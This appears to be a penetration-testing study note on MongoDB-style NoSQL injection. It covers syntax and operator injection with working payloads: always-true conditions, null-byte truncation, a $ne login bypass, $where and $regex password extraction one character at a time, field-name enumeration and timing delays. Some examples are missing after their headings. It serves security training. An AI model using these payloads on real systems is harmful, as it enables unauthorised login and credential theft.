NoSQL injection

Introduction to NoSQL databases

NoSQL databases

  • They are designed to handle large volumes of unstructured or semi-structured data.

    • benefits in terms of scalability, flexibility, and performance

  • Like SQL databases, users interact with data in NoSQL databases using queries but many NoSQL databases use a wide range of query languages instead of a universal standard like SQL (ex. JSON, XML)

NoSQL database models

  • Document stores - These store data in flexible, semi-structured documents. They typically use formats such as JSON, BSON, and XML, and are queried in an API or query language. Examples include MongoDB and Couchbase.

  • Key-value stores - These store data in a key-value format. Each data field is associated with a unique key string. Values are retrieved based on the unique key. Examples include Redis and Amazon DynamoDB.

  • Wide-column stores - These organize related data into flexible column families rather than traditional rows. Examples include Apache Cassandra and Apache HBase.

  • Graph databases - These use nodes to store data entities, and edges to store relationships between entities. Examples include Neo4j and Amazon Neptune.

Types of NoSQL injection

  1. Syntax injection - when you can break the NoSQL query syntax, enabling the injection (likeSQLi).

  2. Operator injection - when you can use NoSQL query operators to manipulate queries.

NoSQL syntax injection

  • Consider:

  • This causes the application to send a JSON query to retrieve relevant products from the product collection in the MongoDB database:

    • this.category == 'fizzy'

  • Inject: ' -> this.category == '''

    • If this causes a change from the original response, this may indicate that the ' character has broken the query syntax and caused a syntax error.

  • Confirm this by submitting a valid query string in the input, e.g.: \' -> this.category == '\''

    • If this doesn't cause a syntax error, this may mean that the application is vulnerable to an injection attack.

Confirming conditional behavior

# False condition
' && 0 && 'x
' && '1'=='2

# True condition
' && 1 && 'x 
' && '1'=='1'+%26%26+0+%26%26+'x'+%26%26+1+%26%26+'x

If the application behaves differently suggests that the false condition impacts the query logic, but the true condition doesn't.

Overriding existing conditions

# Always true: 

# Inject: fizzy'||1||'

# Back-end code
this.category == 'fizzy'||1||''

The modified query returns all items (all the products in any category).

Warn: If an application uses it when updating or deleting data, for example, this can result in accidental data loss.

Null character

MongoDB may ignore all characters after a null character. This means that any additional conditions on the MongoDB query are ignored.

# Back-end code
this.category == 'fizzy' && this.released == 1

# Inject null char'%00

# Back-end code result [removes the req for the released field to be set to 1]
this.category == 'fizzy'\u0000' && this.released == 1

NoSQL operator injection

Examples of MongoDB query operators
  • $where - Matches documents that satisfy a JavaScript expression.

  • $ne - Matches all values that are not equal to a specified value.

  • $in - Matches all of the values specified in an array.

  • $regex - Selects documents where values match a specified regular expression.

MongoDB Query and Projection Operators:

  • JSON example:

    • {"username":"wiener"} -> {"username":{"$ne":"invalid"}}

  • URL parameters:

    • username=wiener -> username[$ne]=invalid

  • If this doesn't work, you can try the following (or use Content Type Converter burp exts):

    1. Convert the request method from GET to POST.

    2. Change the Content-Type header to application/json.

    3. Add JSON to the message body.

    4. Inject query operators in the JSON.


# Login bypass

# Guess with usernames list

# Guess with regex

Other tests

  • Example:{"username":"wiener","password":"peter"}

  • {"username":{"$ne":"invalid"},"password":{"$ne":"invalid"}}

  • This query returns all login credentials where both the username and password are not equal to invalid. As a result, you're logged into the application as the first user in the collection.

Extract data


  • Consider

  • This results in the following NoSQL query of the users collection: {"$where":"this.username == 'admin'"}

  • As the query uses the $where operator, you can attempt to inject JavaScript functions.

    • admin' && this.password[0] == 'a' || 'a'=='b

      • This returns the first character of the user's password string. You can go on...

    • admin' && this.password.match(/\d/) || 'a'=='b

      • Identify whether the password contains digits


  • Consider {"username":"wiener","password":"peter"}

  • Add $where operator as an additional parameter. Send one true request and one false request.

    • {"username":"wiener","password":"peter", "$where":"0"}

    • {"username":"wiener","password":"peter", "$where":"1"}

    • Different responses? This may indicate that the JavaScript expression in the $where clause is being evaluated


  • Consider {"username":"myuser","password":"mypass"}

    • {"username":"myuser","password":"incorrect"} (incorrect password)

    • {"username":"admin","password":{"$regex":"^.*"}}

    • Different responses? The app may be vulnerable

  • {"username":"admin","password":{"$regex":"^a*"}}

    • Extract data character by character

Identify field names


  • Send the payload for an existing field and for a field that doesn't exist.

  • Example

    • admin' && this.username!=' (you know username field exists)

    • admin' &&!=' (you know foo field doesn't exist)

    • admin' && this.password!=' (you want identify password field)


  • If the password field exists, you'd expect the response to be identical to the response for the existing field (username), but different to the response for the field that doesn't exist (foo).


  • You can inject operator?

    • "$where":"Object.keys(this)[0].match('^.{0}a.*')"

    • This query selects documents where the first key (field) of the document starts with the letter "a". You can extract the field name char by char


With intruder set: 1 payload: numbers, 2 payload: bruteforce chars.

You have :

    { "apple": "fruit", "color": "red" },
    { "banana": "fruit", "color": "yellow" },
    { "avocado": "fruit", "color": "green" },
    { "berry": "fruit", "color": "blue" }


db.collection.find({ "$where": "Object.keys(this)[0].match('^.{0}a.*')" })
    { "apple": "fruit", "color": "red" },
    { "avocado": "fruit", "color": "green" }

Timing based injection

Database error doesn't cause a difference in the application's response? Trigger a conditional time delay

  1. Load the page several times to determine a baseline loading time.

  2. Insert a timing based payload into the input. Example {"$where": "sleep(5000)"}

  3. Identify whether the response loads more slowly

  • Trigger a time delay if the password beings with the letter a

    • admin'+function(x){var waitTill = new Date(new Date().getTime() + 5000);while((x.password[0]==="a") && waitTill > new Date()){};}(this)+'

    • admin'+function(x){if(x.password[0]==="a"){sleep(5000)};}(this)+'

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